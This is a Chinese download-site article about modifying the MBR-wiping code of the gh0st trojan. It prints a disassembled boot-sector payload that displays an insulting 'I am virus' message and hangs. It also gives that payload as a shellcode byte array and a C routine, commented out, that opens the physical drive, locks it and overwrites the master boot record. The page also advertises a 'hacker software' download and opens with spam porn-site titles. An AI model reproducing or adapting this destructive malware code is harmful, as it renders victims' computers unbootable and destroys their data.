日本好好热aⅴ|国产99视频精品免费观看|日本成人aV在线|久热香蕉国产在线

• 電腦軟件
• 單機游戲
• 安卓應(yīng)用
• 安卓游戲
• 蘋果電腦
• 蘋果手機

軟件

軟件

文章

搜索

首頁 → 編程開發(fā) → VC|VC++ → vc修改gh0st 中MBR 代碼

vc修改gh0st 中MBR 代碼

相關(guān)軟件相關(guān)文章發(fā)表評論 來源：本站整理時間：2010/11/11 9:53:57字體大�。�A-A+

作者：不詳點擊：319次評論：0次標(biāo)簽： gh0st

暗組肉雞檢測器V4.0 簡體中文特別版

• 類型：黑客軟件大�。�1.2M語言：中文 評分：7.0
• 標(biāo)簽：

立即下載

被改寫的MBR代碼:
作用是清屏并顯示字符:"'I am virus! Fuck you :-)",然后進入死循環(huán)

seg000:0000 mov ax, 12h
seg000:0003 int 10h ; - VIDEO - SET VIDEO MODE
seg000:0003 ; AL = mode
seg000:0005 mov bp, 7C18h ; string start addr
seg000:0008 mov cx, 18h ; string length
seg000:000B mov ax, 1301h
seg000:000E mov bx, 0Ch
seg000:0011 mov dx, 0E1Dh
seg000:0014 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
seg000:0014 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
seg000:0014 ; DH,DL = row,column of starting cursor position, CX = length of string
seg000:0014 ; ES:BP -> start of string
seg000:0014
seg000:0016
seg000:0016 ForeverLoop: ; CODE XREF: seg000:ForeverLoopj
seg000:0016 loop ForeverLoop
seg000:0016
seg000:0016 ; ---------------------------------------------------------------------------
seg000:0018 s_IAmVirusFuckY db 'I am virus! Fuck you :-)'
seg000:0018 seg000 ends


寫入MBR的C代碼:

unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";

int CGh0stApp::KillMBR()
{
// HANDLE hDevice;
// DWORD dwBytesWritten, dwBytesReturned;
// BYTE pMBR[512] = {0};
//
// // 重新構(gòu)造MBR
// memcpy(pMBR, scode, sizeof(scode) - 1);
// pMBR[510] = 0x55;
// pMBR[511] = 0xAA;
//
// hDevice = CreateFile
// (
// "\\\\.\\PHYSICALDRIVE0",
// GENERIC_READ | GENERIC_WRITE,
// FILE_SHARE_READ | FILE_SHARE_WRITE,
// NULL,
// OPEN_EXISTING,
// 0,
// NULL
// );
// if (hDevice == INVALID_HANDLE_VALUE)
// return -1;
// DeviceIoControl
// (
// hDevice,
// FSCTL_LOCK_VOLUME,
// NULL,
// 0,
// NULL,
// 0,
// &dwBytesReturned,
// NULL
// );
// // 寫入病毒內(nèi)容
// WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
// DeviceIoControl
// (
// hDevice,
// FSCTL_UNLOCK_VOLUME,
// NULL,
// 0,
// NULL,
// 0,
// &dwBytesReturned,
// NULL
// );
// CloseHandle(hDevice);
//
// ExitProcess(-1);
return 0;
}

不過寫MBR的方法很挫，會被HIPS報警，而且不能穿透還原或影子

相關(guān)文章

05-06菜鳥對AVA新連狙KnightsSR25沖鋒狙改造方案

05-01ghost裝機出現(xiàn)ghosterr.txt史上最全解決方案

04-27木馬病毒免殺特征碼修改技術(shù)

04-26qq2015怎么修改qq密碼 修改qq密碼的方法

04-26黑客賺錢之道 惡意修改IE首頁成為黑客搖錢樹

04-12Visual Studio 2010 ASP.NET MVC 2初體驗

02-06微軟ASP.NET MVC 2 RC 2 發(fā)布

02-02Windows mobile如何對短信界面美化修改

01-27只需修改十項設(shè)置 就可打造安全牢靠易用電腦

01-22諾基亞6500S開機顯示NOKIA就黑屏不開機

相關(guān)評論

閱讀本文后您有什么感想? 已有23人給出評價!

• 8 喜歡
• 3 頂
• 1 難過
• 5 囧
• 3 圍觀
• 2 無聊

熱門評論

最新評論

發(fā)表評論 查看所有評論(0)

昵稱:

表情:

字?jǐn)?shù): 0/500 (您的評論需要經(jīng)過審核才能顯示)

推薦文章

Ecplise編譯Cygwin環(huán)境、使用CDT插件開發(fā)C/C++ VC6.0打開文件時出錯、無法添加使用的解決辦法

• c++開發(fā)如何避免和解決野指針和內(nèi)存泄漏問題
• VC6.0打開文件時出錯、無法添加使用的解決辦法
• C++中抽象類和接口的區(qū)別 你知道多少？
• 在VC中 Hook Api lib 0.5 源代碼
• 非常經(jīng)典的C語言趣味題目

相關(guān)下載

名稱大小下載

• 1暗組肉雞檢測器1.2M下載
• 2.DAT格式轉(zhuǎn)換修復(fù)工具(VCDGear)1.7M下載
• 3.NET CF 3.5魅族修改版2.8M下載
• 4.NET資源修改工具(Resource .Net V2)113KB下載
• 5[tc]魔獸3 內(nèi)存修改器539KB下載
• 6《cs1.6 》七項屬性修改器342KB下載
• 7《孢子》1.03真正能用修改器916KB下載
• 8《蟲蟲大作戰(zhàn)》修改器359KB下載
• 9《楚留香新傳+桃花傳奇》修改器1.07G下載
• 10《傳奇4》屬性修改器+《傳奇4》DEMO傳送修改器581KB下載

最新文章

• 

  Ecplise編譯Cygwin環(huán)境、使用CDT插件開

  13-04-21
• 

  VC6.0打開文件時出錯、無法添加使用的解

  11-10-31